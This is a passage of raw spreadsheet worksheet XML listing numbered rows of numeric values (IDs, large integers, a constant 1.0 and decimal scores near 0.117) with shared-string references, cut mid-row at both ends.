      <c r="D28417" s="2">
        <v>1.0</v>
      </c>
      <c r="E28417" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28417" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28418" ht="15.75" customHeight="1">
      <c r="A28418" s="1">
        <v>8205.0</v>
      </c>
      <c r="B28418" s="2">
        <v>5.3300635E7</v>
      </c>
      <c r="C28418" s="2" t="s">
        <v>27310</v>
      </c>
      <c r="D28418" s="2">
        <v>1.0</v>
      </c>
      <c r="E28418" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28418" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28419" ht="15.75" customHeight="1">
      <c r="A28419" s="1">
        <v>8526.0</v>
      </c>
      <c r="B28419" s="2">
        <v>5.4096901E7</v>
      </c>
      <c r="C28419" s="2" t="s">
        <v>27311</v>
      </c>
      <c r="D28419" s="2">
        <v>1.0</v>
      </c>
      <c r="E28419" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28419" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28420" ht="15.75" customHeight="1">
      <c r="A28420" s="1">
        <v>9860.0</v>
      </c>
      <c r="B28420" s="2">
        <v>5.6709687E7</v>
      </c>
      <c r="C28420" s="2" t="s">
        <v>27312</v>
      </c>
      <c r="D28420" s="2">
        <v>1.0</v>
      </c>
      <c r="E28420" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28420" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28421" ht="15.75" customHeight="1">
      <c r="A28421" s="1">
        <v>10712.0</v>
      </c>
      <c r="B28421" s="2">
        <v>1.5012068E7</v>
      </c>
      <c r="C28421" s="2" t="s">
        <v>27313</v>
      </c>
      <c r="D28421" s="2">
        <v>1.0</v>
      </c>
      <c r="E28421" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28421" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28422" ht="15.75" customHeight="1">
      <c r="A28422" s="1">
        <v>11411.0</v>
      </c>
      <c r="B28422" s="2">
        <v>2.165388E7</v>
      </c>
      <c r="C28422" s="2" t="s">
        <v>27314</v>
      </c>
      <c r="D28422" s="2">
        <v>1.0</v>
      </c>
      <c r="E28422" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28422" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28423" ht="15.75" customHeight="1">
      <c r="A28423" s="1">
        <v>12196.0</v>
      </c>
      <c r="B28423" s="2">
        <v>2.7491724E7</v>
      </c>
      <c r="C28423" s="2" t="s">
        <v>27315</v>
      </c>
      <c r="D28423" s="2">
        <v>1.0</v>
      </c>
      <c r="E28423" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28423" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28424" ht="15.75" customHeight="1">
      <c r="A28424" s="1">
        <v>12376.0</v>
      </c>
      <c r="B28424" s="2">
        <v>2.8827026E7</v>
      </c>
      <c r="C28424" s="2" t="s">
        <v>27316</v>
      </c>
      <c r="D28424" s="2">
        <v>1.0</v>
      </c>
      <c r="E28424" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28424" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28425" ht="15.75" customHeight="1">
      <c r="A28425" s="1">
        <v>12989.0</v>
      </c>
      <c r="B28425" s="2">
        <v>3.2729276E7</v>
      </c>
      <c r="C28425" s="2" t="s">
        <v>27317</v>
      </c>
      <c r="D28425" s="2">
        <v>1.0</v>
      </c>
      <c r="E28425" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28425" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28426" ht="15.75" customHeight="1">
      <c r="A28426" s="1">
        <v>13165.0</v>
      </c>
      <c r="B28426" s="2">
        <v>3.3954477E7</v>
      </c>
      <c r="C28426" s="2" t="s">
        <v>27318</v>
      </c>
      <c r="D28426" s="2">
        <v>1.0</v>
      </c>
      <c r="E28426" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28426" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28427" ht="15.75" customHeight="1">
      <c r="A28427" s="1">
        <v>14957.0</v>
      </c>
      <c r="B28427" s="2">
        <v>4.1318619E7</v>
      </c>
      <c r="C28427" s="2" t="s">
        <v>27319</v>
      </c>
      <c r="D28427" s="2">
        <v>1.0</v>
      </c>
      <c r="E28427" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28427" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28428" ht="15.75" customHeight="1">
      <c r="A28428" s="1">
        <v>23393.0</v>
      </c>
      <c r="B28428" s="2">
        <v>5575501.0</v>
      </c>
      <c r="C28428" s="2" t="s">
        <v>27320</v>
      </c>
      <c r="D28428" s="2">
        <v>1.0</v>
      </c>
      <c r="E28428" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28428" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28429" ht="15.75" customHeight="1">
      <c r="A28429" s="1">
        <v>24106.0</v>
      </c>
      <c r="B28429" s="2">
        <v>9855385.0</v>
      </c>
      <c r="C28429" s="2" t="s">
        <v>27321</v>
      </c>
      <c r="D28429" s="2">
        <v>1.0</v>
      </c>
      <c r="E28429" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28429" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28430" ht="15.75" customHeight="1">
      <c r="A28430" s="1">
        <v>26248.0</v>
      </c>
      <c r="B28430" s="2">
        <v>1.6319573E7</v>
      </c>
      <c r="C28430" s="2" t="s">
        <v>27322</v>
      </c>
      <c r="D28430" s="2">
        <v>1.0</v>
      </c>
      <c r="E28430" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28430" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28431" ht="15.75" customHeight="1">
      <c r="A28431" s="1">
        <v>27128.0</v>
      </c>
      <c r="B28431" s="2">
        <v>2.0732978E7</v>
      </c>
      <c r="C28431" s="2" t="s">
        <v>27323</v>
      </c>
      <c r="D28431" s="2">
        <v>1.0</v>
      </c>
      <c r="E28431" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28431" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28432" ht="15.75" customHeight="1">
      <c r="A28432" s="1">
        <v>27181.0</v>
      </c>
      <c r="B28432" s="2">
        <v>2.0873122E7</v>
      </c>
      <c r="C28432" s="2" t="s">
        <v>27324</v>
      </c>
      <c r="D28432" s="2">
        <v>1.0</v>
      </c>
      <c r="E28432" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28432" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28433" ht="15.75" customHeight="1">
      <c r="A28433" s="1">
        <v>31868.0</v>
      </c>
      <c r="B28433" s="2">
        <v>5285794.0</v>
      </c>
      <c r="C28433" s="2" t="s">
        <v>27325</v>
      </c>
      <c r="D28433" s="2">
        <v>1.0</v>
      </c>
      <c r="E28433" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28433" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28434" ht="15.75" customHeight="1">
      <c r="A28434" s="1">
        <v>34149.0</v>
      </c>
      <c r="B28434" s="2">
        <v>9855384.0</v>
      </c>
      <c r="C28434" s="2" t="s">
        <v>27326</v>
      </c>
      <c r="D28434" s="2">
        <v>1.0</v>
      </c>
      <c r="E28434" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28434" s="2">
        <v>0.1185897435897436</v>
      </c>
    </row>
    <row r="28435" ht="15.75" customHeight="1">
      <c r="A28435" s="1">
        <v>16889.0</v>
      </c>
      <c r="B28435" s="2">
        <v>4.803608E7</v>
      </c>
      <c r="C28435" s="2" t="s">
        <v>27327</v>
      </c>
      <c r="D28435" s="2">
        <v>1.0</v>
      </c>
      <c r="E28435" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28435" s="2">
        <v>0.1185737976782753</v>
      </c>
    </row>
    <row r="28436" ht="15.75" customHeight="1">
      <c r="A28436" s="1">
        <v>26407.0</v>
      </c>
      <c r="B28436" s="2">
        <v>1.7088168E7</v>
      </c>
      <c r="C28436" s="2" t="s">
        <v>27328</v>
      </c>
      <c r="D28436" s="2">
        <v>1.0</v>
      </c>
      <c r="E28436" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28436" s="2">
        <v>0.1183574879227053</v>
      </c>
    </row>
    <row r="28437" ht="15.75" customHeight="1">
      <c r="A28437" s="1">
        <v>10845.0</v>
      </c>
      <c r="B28437" s="2">
        <v>1.6154935E7</v>
      </c>
      <c r="C28437" s="2" t="s">
        <v>27329</v>
      </c>
      <c r="D28437" s="2">
        <v>1.0</v>
      </c>
      <c r="E28437" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28437" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="28438" ht="15.75" customHeight="1">
      <c r="A28438" s="1">
        <v>18303.0</v>
      </c>
      <c r="B28438" s="2">
        <v>5.2351777E7</v>
      </c>
      <c r="C28438" s="2" t="s">
        <v>27330</v>
      </c>
      <c r="D28438" s="2">
        <v>1.0</v>
      </c>
      <c r="E28438" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28438" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="28439" ht="15.75" customHeight="1">
      <c r="A28439" s="1">
        <v>352.0</v>
      </c>
      <c r="B28439" s="2">
        <v>1.6046757E7</v>
      </c>
      <c r="C28439" s="2" t="s">
        <v>27331</v>
      </c>
      <c r="D28439" s="2">
        <v>1.0</v>
      </c>
      <c r="E28439" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28439" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="28440" ht="15.75" customHeight="1">
      <c r="A28440" s="1">
        <v>8380.0</v>
      </c>
      <c r="B28440" s="2">
        <v>5.3813603E7</v>
      </c>
      <c r="C28440" s="2" t="s">
        <v>27332</v>
      </c>
      <c r="D28440" s="2">
        <v>1.0</v>
      </c>
      <c r="E28440" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28440" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="28441" ht="15.75" customHeight="1">
      <c r="A28441" s="1">
        <v>12085.0</v>
      </c>
      <c r="B28441" s="2">
        <v>2.6703931E7</v>
      </c>
      <c r="C28441" s="2" t="s">
        <v>27333</v>
      </c>
      <c r="D28441" s="2">
        <v>1.0</v>
      </c>
      <c r="E28441" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28441" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="28442" ht="15.75" customHeight="1">
      <c r="A28442" s="1">
        <v>13694.0</v>
      </c>
      <c r="B28442" s="2">
        <v>3.6121361E7</v>
      </c>
      <c r="C28442" s="2" t="s">
        <v>27334</v>
      </c>
      <c r="D28442" s="2">
        <v>1.0</v>
      </c>
      <c r="E28442" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28442" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="28443" ht="15.75" customHeight="1">
      <c r="A28443" s="1">
        <v>30908.0</v>
      </c>
      <c r="B28443" s="2">
        <v>4.677977E7</v>
      </c>
      <c r="C28443" s="2" t="s">
        <v>27335</v>
      </c>
      <c r="D28443" s="2">
        <v>1.0</v>
      </c>
      <c r="E28443" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28443" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="28444" ht="15.75" customHeight="1">
      <c r="A28444" s="1">
        <v>32164.0</v>
      </c>
      <c r="B28444" s="2">
        <v>5.4458006E7</v>
      </c>
      <c r="C28444" s="2" t="s">
        <v>27336</v>
      </c>
      <c r="D28444" s="2">
        <v>1.0</v>
      </c>
      <c r="E28444" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28444" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="28445" ht="15.75" customHeight="1">
      <c r="A28445" s="1">
        <v>11048.0</v>
      </c>
      <c r="B28445" s="2">
        <v>1.81542E7</v>
      </c>
      <c r="C28445" s="2" t="s">
        <v>27337</v>
      </c>
      <c r="D28445" s="2">
        <v>1.0</v>
      </c>
      <c r="E28445" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28445" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="28446" ht="15.75" customHeight="1">
      <c r="A28446" s="1">
        <v>11758.0</v>
      </c>
      <c r="B28446" s="2">
        <v>2.414112E7</v>
      </c>
      <c r="C28446" s="2" t="s">
        <v>27338</v>
      </c>
      <c r="D28446" s="2">
        <v>1.0</v>
      </c>
      <c r="E28446" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28446" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="28447" ht="15.75" customHeight="1">
      <c r="A28447" s="1">
        <v>17463.0</v>
      </c>
      <c r="B28447" s="2">
        <v>4.9849018E7</v>
      </c>
      <c r="C28447" s="2" t="s">
        <v>27339</v>
      </c>
      <c r="D28447" s="2">
        <v>1.0</v>
      </c>
      <c r="E28447" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28447" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="28448" ht="15.75" customHeight="1">
      <c r="A28448" s="1">
        <v>19371.0</v>
      </c>
      <c r="B28448" s="2">
        <v>5.5471243E7</v>
      </c>
      <c r="C28448" s="2" t="s">
        <v>27340</v>
      </c>
      <c r="D28448" s="2">
        <v>1.0</v>
      </c>
      <c r="E28448" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28448" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="28449" ht="15.75" customHeight="1">
      <c r="A28449" s="1">
        <v>32759.0</v>
      </c>
      <c r="B28449" s="2">
        <v>6053979.0</v>
      </c>
      <c r="C28449" s="2" t="s">
        <v>27341</v>
      </c>
      <c r="D28449" s="2">
        <v>1.0</v>
      </c>
      <c r="E28449" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28449" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="28450" ht="15.75" customHeight="1">
      <c r="A28450" s="1">
        <v>6553.0</v>
      </c>
      <c r="B28450" s="2">
        <v>4.8867969E7</v>
      </c>
      <c r="C28450" s="2" t="s">
        <v>27342</v>
      </c>
      <c r="D28450" s="2">
        <v>1.0</v>
      </c>
      <c r="E28450" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28450" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="28451" ht="15.75" customHeight="1">
      <c r="A28451" s="1">
        <v>10320.0</v>
      </c>
      <c r="B28451" s="2">
        <v>5.7702577E7</v>
      </c>
      <c r="C28451" s="2" t="s">
        <v>27343</v>
      </c>
      <c r="D28451" s="2">
        <v>1.0</v>
      </c>
      <c r="E28451" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28451" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="28452" ht="15.75" customHeight="1">
      <c r="A28452" s="1">
        <v>24536.0</v>
      </c>
      <c r="B28452" s="2">
        <v>1.1209822E7</v>
      </c>
      <c r="C28452" s="2" t="s">
        <v>27344</v>
      </c>
      <c r="D28452" s="2">
        <v>1.0</v>
      </c>
      <c r="E28452" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28452" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="28453" ht="15.75" customHeight="1">
      <c r="A28453" s="1">
        <v>33854.0</v>
      </c>
      <c r="B28453" s="2">
        <v>9042232.0</v>
      </c>
      <c r="C28453" s="2" t="s">
        <v>27345</v>
      </c>
      <c r="D28453" s="2">
        <v>1.0</v>
      </c>
      <c r="E28453" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28453" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="28454" ht="15.75" customHeight="1">
      <c r="A28454" s="1">
        <v>31769.0</v>
      </c>
      <c r="B28454" s="2">
        <v>5219083.0</v>
      </c>
      <c r="C28454" s="2" t="s">
        <v>27346</v>
      </c>
      <c r="D28454" s="2">
        <v>1.0</v>
      </c>
      <c r="E28454" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28454" s="2">
        <v>0.1178160919540229</v>
      </c>
    </row>
    <row r="28455" ht="15.75" customHeight="1">
      <c r="A28455" s="1">
        <v>3126.0</v>
      </c>
      <c r="B28455" s="2">
        <v>3.6839468E7</v>
      </c>
      <c r="C28455" s="2" t="s">
        <v>27347</v>
      </c>
      <c r="D28455" s="2">
        <v>1.0</v>
      </c>
      <c r="E28455" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28455" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="28456" ht="15.75" customHeight="1">
      <c r="A28456" s="1">
        <v>12673.0</v>
      </c>
      <c r="B28456" s="2">
        <v>3.0589507E7</v>
      </c>
      <c r="C28456" s="2" t="s">
        <v>27348</v>
      </c>
      <c r="D28456" s="2">
        <v>1.0</v>
      </c>
      <c r="E28456" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28456" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="28457" ht="15.75" customHeight="1">
      <c r="A28457" s="1">
        <v>21674.0</v>
      </c>
      <c r="B28457" s="2">
        <v>2.5026658E7</v>
      </c>
      <c r="C28457" s="2" t="s">
        <v>27349</v>
      </c>
      <c r="D28457" s="2">
        <v>1.0</v>
      </c>
      <c r="E28457" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28457" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="28458" ht="15.75" customHeight="1">
      <c r="A28458" s="1">
        <v>27532.0</v>
      </c>
      <c r="B28458" s="2">
        <v>2.2199264E7</v>
      </c>
      <c r="C28458" s="2" t="s">
        <v>27350</v>
      </c>
      <c r="D28458" s="2">
        <v>1.0</v>
      </c>
      <c r="E28458" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28458" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="28459" ht="15.75" customHeight="1">
      <c r="A28459" s="1">
        <v>28689.0</v>
      </c>
      <c r="B28459" s="2">
        <v>2.7638051E7</v>
      </c>
      <c r="C28459" s="2" t="s">
        <v>27351</v>
      </c>
      <c r="D28459" s="2">
        <v>1.0</v>
      </c>
      <c r="E28459" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28459" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="28460" ht="15.75" customHeight="1">
      <c r="A28460" s="1">
        <v>10369.0</v>
      </c>
      <c r="B28460" s="2">
        <v>7946244.0</v>
      </c>
      <c r="C28460" s="2" t="s">
        <v>27352</v>
      </c>
      <c r="D28460" s="2">
        <v>1.0</v>
      </c>
      <c r="E28460" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28460" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="28461" ht="15.75" customHeight="1">
      <c r="A28461" s="1">
        <v>10521.0</v>
      </c>
      <c r="B28461" s="2">
        <v>1198520.0</v>
      </c>
      <c r="C28461" s="2" t="s">
        <v>27353</v>
      </c>
      <c r="D28461" s="2">
        <v>1.0</v>
      </c>
      <c r="E28461" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28461" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="28462" ht="15.75" customHeight="1">
      <c r="A28462" s="1">
        <v>16278.0</v>
      </c>
      <c r="B28462" s="2">
        <v>4.5792575E7</v>
      </c>
      <c r="C28462" s="2" t="s">
        <v>27354</v>
      </c>
      <c r="D28462" s="2">
        <v>1.0</v>
      </c>
      <c r="E28462" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28462" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="28463" ht="15.75" customHeight="1">
      <c r="A28463" s="1">
        <v>28308.0</v>
      </c>
      <c r="B28463" s="2">
        <v>2.5649811E7</v>
      </c>
      <c r="C28463" s="2" t="s">
        <v>27355</v>
      </c>
      <c r="D28463" s="2">
        <v>1.0</v>
      </c>
      <c r="E28463" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28463" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="28464" ht="15.75" customHeight="1">
      <c r="A28464" s="1">
        <v>30514.0</v>
      </c>
      <c r="B28464" s="2">
        <v>4.0121897E7</v>
      </c>
      <c r="C28464" s="2" t="s">
        <v>27356</v>
      </c>
      <c r="D28464" s="2">
        <v>1.0</v>
      </c>
      <c r="E28464" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28464" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="28465" ht="15.75" customHeight="1">
      <c r="A28465" s="1">
        <v>3944.0</v>
      </c>
      <c r="B28465" s="2">
        <v>4.062132E7</v>
      </c>
      <c r="C28465" s="2" t="s">
        <v>27357</v>
      </c>
      <c r="D28465" s="2">
        <v>1.0</v>
      </c>
      <c r="E28465" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28465" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28466" ht="15.75" customHeight="1">
      <c r="A28466" s="1">
        <v>4889.0</v>
      </c>
      <c r="B28466" s="2">
        <v>4.386801E7</v>
      </c>
      <c r="C28466" s="2" t="s">
        <v>27358</v>
      </c>
      <c r="D28466" s="2">
        <v>1.0</v>
      </c>
      <c r="E28466" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28466" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28467" ht="15.75" customHeight="1">
      <c r="A28467" s="1">
        <v>8976.0</v>
      </c>
      <c r="B28467" s="2">
        <v>5.4957178E7</v>
      </c>
      <c r="C28467" s="2" t="s">
        <v>27359</v>
      </c>
      <c r="D28467" s="2">
        <v>1.0</v>
      </c>
      <c r="E28467" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28467" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28468" ht="15.75" customHeight="1">
      <c r="A28468" s="1">
        <v>10470.0</v>
      </c>
      <c r="B28468" s="2">
        <v>1.0871077E7</v>
      </c>
      <c r="C28468" s="2" t="s">
        <v>27360</v>
      </c>
      <c r="D28468" s="2">
        <v>1.0</v>
      </c>
      <c r="E28468" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28468" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28469" ht="15.75" customHeight="1">
      <c r="A28469" s="1">
        <v>13500.0</v>
      </c>
      <c r="B28469" s="2">
        <v>3.541985E7</v>
      </c>
      <c r="C28469" s="2" t="s">
        <v>27361</v>
      </c>
      <c r="D28469" s="2">
        <v>1.0</v>
      </c>
      <c r="E28469" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28469" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28470" ht="15.75" customHeight="1">
      <c r="A28470" s="1">
        <v>17386.0</v>
      </c>
      <c r="B28470" s="2">
        <v>4.9571941E7</v>
      </c>
      <c r="C28470" s="2" t="s">
        <v>27362</v>
      </c>
      <c r="D28470" s="2">
        <v>1.0</v>
      </c>
      <c r="E28470" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28470" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28471" ht="15.75" customHeight="1">
      <c r="A28471" s="1">
        <v>20989.0</v>
      </c>
      <c r="B28471" s="2">
        <v>1.7021413E7</v>
      </c>
      <c r="C28471" s="2" t="s">
        <v>27363</v>
      </c>
      <c r="D28471" s="2">
        <v>1.0</v>
      </c>
      <c r="E28471" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28471" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28472" ht="15.75" customHeight="1">
      <c r="A28472" s="1">
        <v>21289.0</v>
      </c>
      <c r="B28472" s="2">
        <v>2.0484078E7</v>
      </c>
      <c r="C28472" s="2" t="s">
        <v>27364</v>
      </c>
      <c r="D28472" s="2">
        <v>1.0</v>
      </c>
      <c r="E28472" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28472" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28473" ht="15.75" customHeight="1">
      <c r="A28473" s="1">
        <v>22829.0</v>
      </c>
      <c r="B28473" s="2">
        <v>4.6419601E7</v>
      </c>
      <c r="C28473" s="2" t="s">
        <v>27365</v>
      </c>
      <c r="D28473" s="2">
        <v>1.0</v>
      </c>
      <c r="E28473" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28473" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28474" ht="15.75" customHeight="1">
      <c r="A28474" s="1">
        <v>24597.0</v>
      </c>
      <c r="B28474" s="2">
        <v>1.1395534E7</v>
      </c>
      <c r="C28474" s="2" t="s">
        <v>27366</v>
      </c>
      <c r="D28474" s="2">
        <v>1.0</v>
      </c>
      <c r="E28474" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28474" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28475" ht="15.75" customHeight="1">
      <c r="A28475" s="1">
        <v>28093.0</v>
      </c>
      <c r="B28475" s="2">
        <v>2.4654294E7</v>
      </c>
      <c r="C28475" s="2" t="s">
        <v>27367</v>
      </c>
      <c r="D28475" s="2">
        <v>1.0</v>
      </c>
      <c r="E28475" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28475" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28476" ht="15.75" customHeight="1">
      <c r="A28476" s="1">
        <v>29012.0</v>
      </c>
      <c r="B28476" s="2">
        <v>2.9980111E7</v>
      </c>
      <c r="C28476" s="2" t="s">
        <v>27368</v>
      </c>
      <c r="D28476" s="2">
        <v>1.0</v>
      </c>
      <c r="E28476" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28476" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28477" ht="15.75" customHeight="1">
      <c r="A28477" s="1">
        <v>31998.0</v>
      </c>
      <c r="B28477" s="2">
        <v>5335923.0</v>
      </c>
      <c r="C28477" s="2" t="s">
        <v>27369</v>
      </c>
      <c r="D28477" s="2">
        <v>1.0</v>
      </c>
      <c r="E28477" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28477" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28478" ht="15.75" customHeight="1">
      <c r="A28478" s="1">
        <v>32278.0</v>
      </c>
      <c r="B28478" s="2">
        <v>5534375.0</v>
      </c>
      <c r="C28478" s="2" t="s">
        <v>27370</v>
      </c>
      <c r="D28478" s="2">
        <v>1.0</v>
      </c>
      <c r="E28478" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28478" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28479" ht="15.75" customHeight="1">
      <c r="A28479" s="1">
        <v>32280.0</v>
      </c>
      <c r="B28479" s="2">
        <v>5534375.0</v>
      </c>
      <c r="C28479" s="2" t="s">
        <v>27371</v>
      </c>
      <c r="D28479" s="2">
        <v>1.0</v>
      </c>
      <c r="E28479" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28479" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="28480" ht="15.75" customHeight="1">
      <c r="A28480" s="1">
        <v>2551.0</v>
      </c>
      <c r="B28480" s="2">
        <v>3.4151124E7</v>
      </c>
      <c r="C28480" s="2" t="s">
        <v>27372</v>
      </c>
      <c r="D28480" s="2">
        <v>1.0</v>
      </c>
      <c r="E28480" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28480" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="28481" ht="15.75" customHeight="1">
      <c r="A28481" s="1">
        <v>14825.0</v>
      </c>
      <c r="B28481" s="2">
        <v>4.0970515E7</v>
      </c>
      <c r="C28481" s="2" t="s">
        <v>27373</v>
      </c>
      <c r="D28481" s="2">
        <v>1.0</v>
      </c>
      <c r="E28481" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28481" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="28482" ht="15.75" customHeight="1">
      <c r="A28482" s="1">
        <v>16554.0</v>
      </c>
      <c r="B28482" s="2">
        <v>4.6829393E7</v>
      </c>
      <c r="C28482" s="2" t="s">
        <v>27374</v>
      </c>
      <c r="D28482" s="2">
        <v>1.0</v>
      </c>
      <c r="E28482" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28482" s="2">
        <v>0.117003367003367</v>
      </c>
    </row>
    <row r="28483" ht="15.75" customHeight="1">
      <c r="A28483" s="1">
        <v>18842.0</v>
      </c>
      <c r="B28483" s="2">
        <v>5.3964421E7</v>
      </c>
      <c r="C28483" s="2" t="s">
        <v>27375</v>
      </c>
      <c r="D28483" s="2">
        <v>1.0</v>
      </c>
      <c r="E28483" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28483" s="2">
        <v>0.117003367003367</v>
      </c>
    </row>
    <row r="28484" ht="15.75" customHeight="1">
      <c r="A28484" s="1">
        <v>8079.0</v>
      </c>
      <c r="B28484" s="2">
        <v>5.3011738E7</v>
      </c>
      <c r="C28484" s="2" t="s">
        <v>27376</v>
      </c>
      <c r="D28484" s="2">
        <v>1.0</v>
      </c>
